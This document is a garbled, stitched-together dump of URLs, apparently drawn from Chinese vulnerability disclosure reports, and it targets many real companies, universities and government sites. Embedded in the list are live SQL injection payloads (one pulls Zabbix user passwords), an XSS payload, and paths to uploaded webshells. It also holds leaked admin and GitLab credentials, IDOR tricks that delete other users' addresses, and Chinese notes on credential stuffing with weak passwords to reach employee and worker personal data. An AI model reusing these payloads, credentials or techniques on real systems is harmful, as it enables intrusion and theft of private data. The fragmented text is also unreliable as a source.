www.xxx.com代替! http://itjuzi.com/company/26605 www.xxx.com/cookie.asp换成自己服务器上获取cookie的asp的url地址! http://weixin.hazq.com http://house.cnfol.com/inner/RealEstate.shtml?name=%E9%98%B3%E5%85%89%E5%9F%8E%E9%87%91%E8%9E%8D%E8%A1%97%E5%AE%98%E9%82%B8&area=%E5%8F%B0%E6%B1%9F%E5%8C%BA&id=231 http://www.haodou.com/ http://211.151.151.208/dashboard.php http://zhidao.baidu.com/link?url=BB5-hfPXePKeO7TsCm5qiUQ8CPUYR3oF1Y-jbhhVXSLIyIkM9DU9Qzv8ZW6Z-2dLh4Qap6hpYlSRxQOxyhd1sK https://account.fund123.cn/login/ResetPassword/index.aspx http://**.**.** http://**.**.**.**/software/demo_page.php?cat_id=14 http://219.134.61.11:81/Login.jsp http://58.83.167.66/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://61.135.105.169:8081/114admin/login.html?redirect=true联通114116网上商城管理系统 http://qzlx.henu.edu.cn/feedback/index.php http://qzlx.henu.edu.cn/feedback/uploads/ http://qzlx.henu.edu.cn/feedback/uploads/2015_09_10_13_09_32_202.196.96.233_foote.php http://**.**.**.**/fzxx_detail.php?cid=&id=475 www.ciscostation.com.cn http://**.**.**.**/ http://180.169.36.120:7001/mbp/login.jsp http://180.169.36.120:7001/console/ http://180.169.36.120:7001/ma/ma1.jsp http://**.**.**.**:8080/index.php cn:82/index.php http://club.yuyue.com.cn:82/e-about.asp?id=350 http://**.**.**.**/renzhengjifeiguanli/ jdbc:oracle:thin:@**.**.**.**:1521:lgy http://219.141.167.56/index.php?m=company&f=browse http://**.**.**.**/Manage/Default.aspx http://agents.easou.com/ http://**.**.**.**/CmxDownload.php http://**.**.**.**/CmxDownload.php http://**.**.**.**:8088/CmxDownload.php http://**.**.**.**/CmxLogin.php http://**.**.**.**:8089/CmxLogin.php http://**.**.**.**:8000/CmxDownload.php http://**.**.**.**:808/CmxDownload.php http://kf.07073.com/company/member/skip http://**.**.**.**/bugs/wooyun-2015-0135197继这个 http://221.8.57.98:7005/EbsWeb/getMyInsurance.do?UIAction=ClaimQueryCheck&type=queryClaim&entryID=null&areaCode=&customerCName=1&licenseNo=1&policyno=1&vinno=1 http://ess.cninsure.net http://ess.cninsure.net/product/common/cvar/CExec.jsp http://42.62.33.11/index.php http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1 http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set_submit.jsp?portlet_id=1 http://oa.guanhao.com:8080/kingdee/portal/portlet/document/view.jsp?portal_id=1&portlet_id=1 http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1 http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://202.202.43.244 http://222.177.140.97/ http://vlab.cqupt.edu.cn:8080 http://**.**.**.**/manage/news_list.asp?zhuid=11 http://**.**.**.**/onlinetest/show.asp?id=613 http://**.**.**.**/manage/news_showimg.asp?imgID=4463 http://admin.1jiajie.com/v2/ http://old.admin.1jiajie.com/ admin.1jiajie.com/v2/index.php?action=login&do=auth http://admin.1jiajie.com/stuff.html http://admin.1jiajie.com/400/d_face/l.php http://admin.1jiajie.com/400/d_face/u.html http://admin.1jiajie.com/400/d_face/face/13111111111.php http://122.96.51.14/C6V3/Jhsoft.Web.login/PassWordNew.aspx http://122.96.51.14/C6V3/Images/red/t.aspx http://www.yamaha-motor.com.cn/marine/boat/store_detail.php?id=7 http://www.yamaha-motor.com.cn/marine/data/attachment/file/ http://www.agile.com.cn/agile/projectdetail/index.asp?id=15 http://kq.rthxchina.com:7070/Login.aspx http://wooyun.org/bugs/wooyun-2015-0139822 aspnet:MaxHttpCollectionKeys http://**.**.**.**/Product.aspx?p1=1 http://**.**.**.**/class.jsp?sid=79&sortid=103 http://218.84.62.118:8080/login http://oa.shpbs.com/member/MemberLogin.aspx,此处可撞库,遍历工号(格式如SH00688)后四位和弱口令123456即可获取十来个有效账号,登陆后可查看公司内部文件和通讯录(4000多名员工手机和邮箱)等内部信息。 http://bbs.g.letv.com https://**.**.**.**/grutz/h3c-pt-tools URL:http://app.wanda.cn/wanda3v/user/userinfo.html?vid=2a51f71011fc448cb186eb1958b0ec55&sysversion=5.1&devtype=1&appversion=3.0&userid=caodajun http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**,登录成功后打开地址 http://**.**.**.**/app/DBMS/LBS_Manager/AddAccount.aspx?KeyWord=1&HoldID=0 http://**.**.**.**/DBMS/AddHoldInfo.aspx?holdId=110098&parent=0 http://**.**.**.**/DBMS/LBS_Manager/AddUserInfo.aspx?ParentHoldID=1&holdID=115855&userID=71072 http://**.**.**.**/在运营商登录处登录 http://**.**.**.**/index.aspx http://**.**.**.**/ http://www.ciscostation.com.cn/index.jsp http://www.ciscostation.com.cn/NewsView.jsp?ID=3364 http://www.suningestate.com/ www.suningestate.com http://wap.1jiajie.com/ http://123.57.239.59/ admin:123456 http://www.haolyy.com/retail/58516?nid=bopu2015071106400978726500B60F http://www.namex.cn/HomeLink/OrderList.aspx http://doogua.dangdang.com/auth ID:Hyjal的帐号,数字ID520 http://222.223.188.223:7001/ http://222.223.188.223:7001/console/ http://222.223.188.223:7001/duo/2.jsp http://cbs.cninsure.net/ http://cbs.cninsure.net/logon/Login.jsp http://agency.1jiajie.com/ http://agency.1jiajie.com/v2/app/Static/upload/face/2015091109532755f234174a7a0.php http://ds34.digitalchina.com/HPISS/fix/sdar.aspx?bill_id=4751594513-471 http://www.ciscostation.com.cn/solutionview.jsp?ID=16 http://servexpress.digitalchina.com/sms/onlinetest/login.asp http://servexpress.digitalchina.com e6:76:68:81:17 http://www.ciscostation.com.cn/storiesview.jsp?ID=31 http://digitalmuseum.zju.edu.cn/jiaoyu.do?methede=morexinwen&newstype=news http://222.66.48.164:7001/console/login/LoginForm.jsp http://222.66.48.164:7001/ma/ma3.jsp http://**.**.**.**:8081/ http://**.**.**.**:8081 http://www.ciscostation.com.cn/ www.ciscostation.com.cn http://221.12.171.172:8024/hsicpweb/scmLoginManage.do?method=init http://60.191.25.162:8009/dashboard/tab/builds http://bc.ttnet.net/ http://60.191.25.162:8056/ http://**.**.**.**/phpadmin/ http://**.**.**.**/index.php?id=132 http://60.191.25.162:8085/login.jsp http://**.**.**.**/cas/login?service=http%3A%2F%2F**.**.**.**%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**/Login.jsp http://**.**.**.**:7070/Login.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**/cas/login?service=http%3A%2F%2F**.**.**.**%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**/denglu/denglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**/cas/login?service=http%3A%2F%2F**.**.**.**%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8091/Login.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://d.huxiu.com/ http://adminx.huxiu.com/ http://**.**.**.**/news.asp?ItemID=262 http://m.wangpiao.com/wptouch/touch/orderDetail?check=0&OrderId=0025830008 http://www.wangpiao.com/company/company_introduce.html http://121.43.73.234:7001/trustWeb/login.jsp http://121.43.73.234:7001/console/ http://121.43.73.234:7001/ma/ma1.jsp http://www.1jiajie.com/quickorder.html?stype=3&slist=1 http://www.huxiu.com/group/thread/145055/1.html http://tengfu1319.69dai.com/mix/mixLogin?userName=13117619183&loginPassword=4297f44b13955235245b2497399d7a93&checkCode=7110&redirctUrl= http://www.69dai.com,自动登录 http://www.1jiajie.com/login.html www.1jiajie.com/ajaxCheckPromoCode.html http://www.1jiajie.com http://www.yunjiazheng.com/member/regshow http://**.**.**.**/bugs/wooyun-2015-0130475 http://**.**.**.**/ http://**.**.**.**/xzzf/admin/ http://119.147.86.247:8088/ http://**.**.**.**/show.asp?id=5969 www.dudujiaoche.com admin:htoa http://ids.suibe.edu.cn/amserver/UI/Login?gx_charset=UTF-8网站 http://open.iqiyi.com/developer/register/info/view http://oa.cnht.com.cn:9060 http://hr.cnht.com.cn:11000/ehr/login.jspa http://dev.koyimall.com/mall/view.html?cate=GD1H0A&seq=199721 http://115.28.63.116/index.php?g=home&m=zone&a=detail&zoneId=128 http://115.28.63.116/index.php?g=home&m=case&a=detail&caseid=1140 http://**.**.**.**/link?url=edvBocqiDXbNxrzGwbQXChJDGgNmk0RUiZA5ioTHbYRtnVfQeVeYYtHiRVZV8W6kFC_9c9Xhoa1GgZw0Vh9BxKdFUIW4mbEmLmiExQ38Tii http://old.admin.1jiajie.com http://servexpress.digitalchina.com/sms/DELL/wurnew/confirm_snap.asp?bill_id=D506184191 http://www.e-bridge.com.cn/news/showNewsDetail.do?oid=3203&sortid=8 http://www.ciscostation.com.cn/bbs/bbsplate.jsp?bankuai=3 http://baby.kangq.com/html/detail-42447*.html http://bangong.aili.com http://www.wenji99.com http://www.wenji99.com/?m=shop&keys= http://www.wenji99.com/?m=shop&keys=%27 http://www.ciscostation.com.cn/productview.jsp?ID=13 http://**.**.**.**:8080/SearchSupervision.aspx http://www.chinaticket.com/my/orderdetail/184074.html http://www.chinaticket.com/faq/44.html http://game.feng.com/gamenew/fengComment/getCommentListSecond.shtml http://www.njcb.com.cn/jsearch/setup/opr_licenceinfo.jsp http://www.njcb.com.cn/jsearch/VerifyCodeServlet?var=cookie_username http://www.njcb.com.cn/jsearch/setup/opr_licenceinfo.jsp http://dev.koyimall.com/board/bbs_view.html?bbs_code=notice&category_code=&cpage=1&seq=16250 http://www.angelvestgroup.com/cn/about.php?id=1 http://www.angelvestgroup.com/cn/about.php?id=1 http://www.angelvestgroup.com/info.php?id=1 http://www.angelvestgroup.com/info.php?id=1 http://www.angelvestgroup.com/info.php?id=1 http://www.ciscostation.com.cn/mall/mallmerchandise.jsp?gid=377 http://b2b.crphenan.com:9666/b2b/firstpage/firstpage_init.action http://b2b.crphenan.com:9666/b2b/product/do_getImageData.action http://**.**.**.**/bugs/wooyun-2010-0116363 http://**.**.**.**/bugs/wooyun-2015-0137759/trace/0217d61dc7d852a384cc231f4bb8775a http://**.**.**.**/bugs/wooyun-2015-0137760/trace/5dd55d78df354fc3b1387d3bdbc2b596 http://**.**.**.**/select_pro.aspx?type=productname&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/select_job.aspx?type=jobname&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/select_jianli.aspx?type=workto&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/ExhibitionCenter.aspx?type=hzmc&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/ExhibitionCenter.aspx?area=asd1%27/**/and/**/1=@@version--%20- http://**.**.**.**/viewmulu.aspx?qi_id=0&preqi_id=@@version&mid=23292&xuhao=56 http://**.**.**.**/SupplyList.aspx?parentid=0&classid=@@version http://**.**.**.**/select_news.aspx?type=1&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**:6677/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 www.chinaticket.com/my/address/edit.html?id=*** www.chinaticket.com www.chinaticket.com/my/do/address.do?act=del&id=*** www.chinaticket.com/my/address/edit.html?id=*** www.chinaticket.com/my/do/address.do?act=del&id=***,id改为其他人的地址即可删除成功,再查看时已不存在: url:http://**.**.**.**/default.aspx http://sns.midea.com http://idea.midea.com http://219.134.188.38:81/DCS_UAT/ http://enter.koyimall.com:80/ http://**.**.**.**/?a=web.article&uid=8890&id=12300&act=youerzaojiao&navid=2 http://**.**.**.**/?a=web.articles&uid=8889&id=406 http://**.**.**.**/?a=web.articles&uid=9052&id=3719 http://**.**.**.**/?a=web.articles&uid=9028&id=3538 http://**.**.**.**/?a=web.article&uid=8947&id=4940 http://**.**.**.**/?a=web.articles&uid=8898&id=112 http://**.**.**.**/?a=web.articles&uid=8923&id=687 http://**.**.**.**/?a=web.articles&uid=8927&id=762 http://**.**.**.**/?a=web.articles&uid=9034&id=3409 http://**.**.**.**/clf/system/login_admin.aspx www.chinaticket.com http://cms.1jiajie.com http://open.iciba.com/ds_open.php?id=2156&name=wpfAppliaction1&auth=D3A737B1579CB2AAA926365FAC9B32E6 http://csc.zte.com.cn/csc/helpdesk.aspx?eccLanguage=English&logon=first&fromStr=eccindex&systemName=ECC1&employeeNum=10057782 http://csc.zte.com.cn/callcenter/mobilenote.htm http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/btin_cms/cnt/moreCount.do http://wx.chuchujie.com/sqe?s=Order&a=get_order_list&vcode=88350dd4b55726&ctime_start=2015-09-09&ctime_end=2015-09-11&status=1 http://125.32.26.18/Notice.aspx?id=7 http://125.32.26.18/Notice.aspx?id=4 http://ssqj.qiye.ikanshu.cn/ http://ssqj.qiye.ikanshu.cn/org!bookList.xhtml?qiyeId=4&searchKey=a* http://ms.hinews.cn/bl_pl_save.php http://mobile.jianlc.com/app/profile/sendInvestContract.shtml http://www.ciscostation.com.cn/mall/jdclassify.jsp?cxtype=jd&jftype=wx http://inc.form.xiaoma.com/ http://www.ciscostation.com.cn/mall/mallhddise.jsp?gid=411 http://www.e-bridge.com.cn:80/ www.e-bridge.com.cn http://zn.baidu.com/kgs/result?q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E www.ganji.com http://el.cninsure.net/SumTotal/login.htm http://**.**.**.**/DQ/Publicity/ExmYdGvDetail.asp?dGovernID=A01 http://**.**.**.** http://gjb4.95081.com/login.jsp,管家宝,此处可进行撞库,用拼音字母和弱口令123456可获得20多个账号,登陆后可查看订单管理、客户管理、员工管理等等敏感信息,可获知超过4万名家政人员的姓名、电话和身份证照。 www.winona.cn http://www.winona.cn/article-weishijie-l-21.html http://www.winona.cn/shopadmin/index.php http://**.**.**.**/site_item_content_2.php?site_map_item_id=361 www.koyimall.com http://drops.wooyun.org/papers/7830 URL:http://bbs.cy.com/ http://admin.iyishengyuan.com/ http://**.**.**.**/web/DwDetail.aspx?bh=CJGLJCDD http://www.uhuibao.com http://clm.njau.edu.cn/book/BookList.aspx?ckey=C156 http://**.**.**.**/bugs/wooyun-2010-0101950 http://**.**.**.**/site_item_list_4.php?site_map_item_id=139 http://**.**.**.**/huide_hosp/big5/event_photo_detail_list.php?event_id=1 http://**.**.**.**/event_photo_detail_list.php?event_id=1 http://**.**.**.**/event_photo_detail_list.php?event_id=1 http://**.**.**.**/event_photo_detail_list.php?event_id=1 http://222.168.22.57:7001/mmis2 http://222.168.22.57:7001/aes/ http://222.168.22.57:7001/shortcutPays/ http://222.168.22.57:7001/console/login/LoginForm.jsp http://222.168.22.57:7001/ma/ma3.jsp http://szhxy.guet.edu.cn/qxgl/public/RegArm.aspx?userid=a http://rss.aili.com/index.php?cid=1&coludir=celeb http://e.changyan.sohu.com/ http://222.188.208.51:7003/mspf/1/login.do http://222.188.208.51:7003/JSMSServer/login.jsp http://222.188.208.51:7003/BanKloudServer/ http://222.188.208.51:7003/console/login/LoginForm.jsp http://222.188.208.51:7003/ma/ma3.jsp jdbc:oracle:thin:@172.16.100.25:1521:mspf http://**.**.**.**/ http://**.**.**.**/gjjview.asp(住房公积金缴存余额查询) http://**.**.**.**/dkview.asp(住房公积金贷款余额查询) http://**.**.**.**/active/news/flash/swf.asp?id=49 http://**.**.**.**/ http://zmifi.com/ http://zmifi.com/zmifi.rar http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=11001 http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=11001 http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=11001 http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=11001 http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=1111 http://oa.cashchina.cn:8080/portal/pages/index.jsp www.s.com www.sh.com ip:192.168.1.28 ip:192.168.1.28 http://blog.social-touch.com/ http://blog.social-touch.com/wp-content.tar.gz http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ninghe/search.jsp http://ybmis.fj.sgcc.com.cn/ http://higo.meilishuo.com/hgweixin/index.php?r=wish/detail&id=1 https://passport.coocaa.com/html2/login.html http://jl.sanhao.com/ http://jl.sanhao.com/admin/login.php http://jl.sanhao.com/admin/upload.php URL:http://**.**.**.** http://1jiajie.com/login.html http://**.**.**.**/gf/wnwb**.**.**.**.exe file:///C:/Windows/System32浏览系统目录,并下载cmd.exe; http://servexpress.digitalchina.com/ http://xmbc.xiaoma.com/users/153 http://xmbc.xiaoma.com/users/151 http://xmbc.xiaoma.com/users/152 http://xmbc.xiaoma.com/users/150 http://5sing.kugou.com/m/login.html http://wap.ccqtcc.com/ http://wap.ccqtcc.com/adminzxc/index.asp http://xyb.cupl.edu.cn/Alumni_donate.aspx?stype=42 http://www.econ.sdu.edu.cn/bkjx/list_all.php?sortid=117 http://m.sanhao.com/log.txt http://its.zte.com.cn/SSO/ http://**.**.**.**/cmd.php http://**.**.**.**/cmd.php?cmd=ls http://www.yikuaiqu.com/ http://maijia.zol.com/ http://maijia.zol.com/index.php?c=GoodsManagerAddGoods&productStatus=0&subId=851&manuId=40685&keyWords=sql http://cms82.vojs.cn/source/zcr_zan.php?gid= http://sqlmap.org http://**.**.**.**/index.php?a=lists&m=index&id=1 http://biz.cli.im/vcardview/*****形式。*处为五位字幕数字的组合。这么短的编号很容易使用穷举的方法遍历,能够不经过用户同意就获取到用户名片信息。 http://yezhu.qingdaonews.com/threadcount.php?fid=656 http://sqlmap.org http://mailserver.juneyao.com/ http://192.168.34.105/wechat/ http://192.168.0.181/ http://shop.1mxian.com/ http://shop.1mxian.com/orders/totalBeforeWaiting http://**.**.**.**/index.php?area=wlmq http://weixin.union.appchina.com/ http://its.zte.com.cn/univ/login.aspx http://www.zufangzi.com/ http://www.itl.cn/news_edit.jsp http://www.job168.com/dxc/infor/detail.jsp?info_no=5581 http://www.dcleasing.com.cn/ http://www.dcleasing.com.cn/news/class/index.php?author=&catid=1%27%22&key=&myord=dtime&myshownums=&page=3&showdate=&showtj= http://**.**.**.**/invoker/JMXInvokerServlet http://zhuanti.inewsweek.cn/list.php?catalog_id=237 http://sqlmap.org http://its.dcpc.com/w8/pages/default/index-m.aspx http://enter.koyimall.com/?bid=koyimall&c=1/9&cat=&iframe=&keyword=1&m=bbs&orderby=asc&r=home&recnum=20&skin=&sort=gid&type=&where=name http://**.**.**.**/FCKeditor/editor/fckeditor.html http://**.**.**.**/info_Print.asp?ArticleID=292 http://www.cunloan.com/ http://wapsd.189.cn/self/self/busipack/gettp4g.do?typeId=105 http://211.151.249.76 http://211.151.249.76/jianli http://**.**.**.**/Login.aspx http://203.91.46.81:8010/global/Account/login http://licai.shangdu.com/ http://licai.shangdu.com/licai.zip http://kaoshi.corp.ganji.com http://kaoshi.corp.ganji.com http://hr.acmcoder.com/ http://**.**.**.**/online_join.asp?cid=1 http://m.1jiajie.com/.git/config root:ejiajieadmin123 http://root:ejiajieadmin123@gitlab.1jiajie.com/user/ejj-user-mobile-web.git http://baqi.etuan.com/ http://**.**.**.**:9080/wscgs/yymap.do?dwlb=01&type=load,dwlb参数存在注入点。 http://**.**.**.**/bch/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx http://www.sanhao.com/ http://dl.sz.baidu.com/ime/setup/BaiduPinyinSetup_TN_3.1.2.376_1.exe file:///C:/Windows/System32浏览系统目录,并下载cmd.exe; http://cpip.dfl.com.cn/yclcgdd/YCLCGDDetail.aspx?ID=7777 http://cn.cvte.com/.wp-config.php.swp http://**.**.**.**/dict_query.aspx http://**.**.**.**/fmetadatalist.aspx?bh=750 http://**.**.**.**//simpsearch.aspx http://**.**.**.**/fmetadatalist.aspx?bh=750 http://jz.etuan.com:80/ http://219.143.230.163/uddiexplorer/SearchPublicRegistries.jsp http://219.143.230.186/uddiexplorer/SearchPublicRegistries.jsp http://114.251.229.213/uddiexplorer/SearchPublicRegistries.jsp http://219.143.230.136/uddiexplorer/SearchPublicRegistries.jsp http://sc.12321.cn:80/welcome.do?optype=forwardto&img=0 http://www.newsmyshop.com com:3306 http://xyxy.immomogame.com/index.php http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-097838 http://**.**.**.**/ http://omstest.vmall.com http://www.zhulong.com.cn:84/zentao/user-login-L3plbnRhby8=.html http://**.**.**.**/index.php?lang=zh-gb2312&server=1 http://www.de175.com/admin/login/login.php http://wooyun.org/bugs/wooyun-2015-0130301 http://gongyi.homelink.com.cn/lianjia/portal/index http://gongyi.homelink.com.cn/lianjia/portal/user/personalCenterUpdate http://**.**.**.**:8080/QuJi/SanJi/Qzb_Print_Note.aspx?eventid=001501240310 http://221.8.57.106:7002/console http://221.8.57.106:7003/console http://221.8.57.106/console http://221.8.57.106:7002/mses/ http://221.8.57.106:7002/gps/LoginServlet http://221.8.57.106:7002/dsp http://221.8.57.106:7003/mabis/ http://221.8.57.106/wxpt/ mx://res/error/danger_site.htm特权域时发现有对URL的处理: http://backoffice.111.com.cn/ http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=30004 http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=30004 http://www.orchidasia.com/fckeditor/editor/filemanager/browser/default/browser.html?%20Type=../&Connector=connectors/aspx/connector.aspx页面可以直接上传.aspx和.asp文件 www.orchidasia.com http://www.orchidasia.com http://**.**.**.**/News/ContentPage.aspx?category=N001&newsid=635398294777364362 http://wooyun.org/bugs/wooyun-2015-0130299 http://182.92.234.7/Admin/user/Login http://webcasqa2.byd.com.cn/sso/member.php?mod=register http://webcasqa2.byd.com.cn/sso/member.php?mod=lostpasswd http://club.hydron.com.cn/ http://xue.huaji.com/florist.php?type=5 http://**.**.**.**/indexAction.action http://**.**.**.**/hrm/resource/HrmResource.jsp?id=2000 http://xd.mediav.com/s?type=8&r=7&impid=OjIAOoBlspo=&cid=53265194&size=610x100 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/jcpu/ http://**.**.**.**/ http://**.**.**.**/cjcmmte/ http://**.**.**.**/jrs/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/kcdz/ http://**.**.**.**/dzyktcn/ http://**.**.**.**/ http://**.**.**.**/ch/reader/inner_key_query_list.aspx http://**.**.**.**/ch/reader/inner_luxury_advance_query_article_list.aspx http://**.**.**.**/ch/reader/luxury_advance_query_article_list.aspx http://**.**.**.**/ch/reader/new_advance_query.aspx http://**.**.**.**/ch/reader/query_recent_article_list.aspx http://**.**.**.**/ch/reader/resci_recent_article.aspx http://**.**.**.**/ch/reader/wait_published_articles.aspx http://**.**.**.**/ch/dbmanager/table_manager.aspx http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001 http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001 E7-Planning.war/WEB-INF/classes/dataSource.properties jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl http://117.40.240.192:7001/cms2 http://117.40.240.192:7001/console/ http://117.40.240.192:7001/ma/ma3.jsp http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/Admin_Login.aspx http://**.**.**.**/ http://wap.anwmce.com/register.ASP?id=1 http://wap.anwmce.com/adminzxc/mylist.asp http://wap.anwmce.com/adminzxc/index.asp http://www.chinacoldchain.com/bgapp/Index.htm http://**.**.**.**:8100/ksbm/index.php http://**.**.**.**:8100/info/2015%E8%8B%8F%E5%B7%9E%E5%B8%82%E5%85%AC%E5%8A%A1%E5%91%98%E9%80%89%E8%B0%83/%E5%B8%90%E5%8F%B7%E5%AF%86%E7%A0%81.txt http://house.gzmama.com/index.php?a=index&g=Loupan&m=Search&saleid=46&sitetag=123 http://**.**.**.**/cysz.php?id=242 http://meiqia.com/password/find http://www.17ugo.com/searchd.php?act=comment&goods_id= http://mobile.letao.com/wap/app_download.aspx?bid=12&op=brand http://**.**.**.**/为例 http://**.**.**.**/Admin/fileManage.aspx?action=DOWNLOAD&value1=~%2FApp_Data%2FHsort.mdb http://**.**.**.**/Admin/fileManage.aspx?action=DOWNLOAD&value1=~%2FWeb.config http://221.237.153.42:10002/Forms/Log.aspx http://big5.bankcomm.com http://big5.bankcomm.com/gate/big5/www.bankcomm.com.zhihuijinan.cc/css/player.swf?csdn.net?/doms_web_syste/X758#5173.com/detail/JS227-20150913.shtml http://bizinfo.airkunming.com/ http://bizinfo.airkunming.com/%C0%AE/WEB-INF/web.xml http://bizinfo.airkunming.com/%C0%AE/WEB-INF/struts-config.xml http://bizinfo.airkunming.com/%C0%AE/WEB-INF/config/example/struts-config-example.xml http://bizinfo.airkunming.com/%C0%AE/WEB-INF/config/system/struts-config-system.xml http://bizinfo.airkunming.com/module/system/hrsearchepositionList.jsp http://bizinfo.airkunming.com/module/b2c/message/msgList.jsp http://bizinfo.airkunming.com/module/b2c/member/userList.jsp http://bizinfo.airkunming.com/module/info/info_website.jsp http://wd.fync.edu.cn http://wd.fync.edu.cn/webfile.aspx http://**.**.**.**/ApplicationSearch.aspx?type=1 http://**.**.**.**/XingZhengQuanLi.php?TableId=1&ChannelId=4 http://**.**.**.**:7500/Login/Index http://www.skyworthlcd.com/zh-cn/Product.aspx?s=a%27%27 URL:http://**.**.**.**/cgsite.pr.prCgImgDetail.do?imgId=250821 http://**.**.**.**/index.php?m=instarea&c=infund&inst_code=80000220 http://mall.srcb.com/customer/member/memberedit.jhtml http://**.**.**.**/nuclear/upload/123.jsp http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** 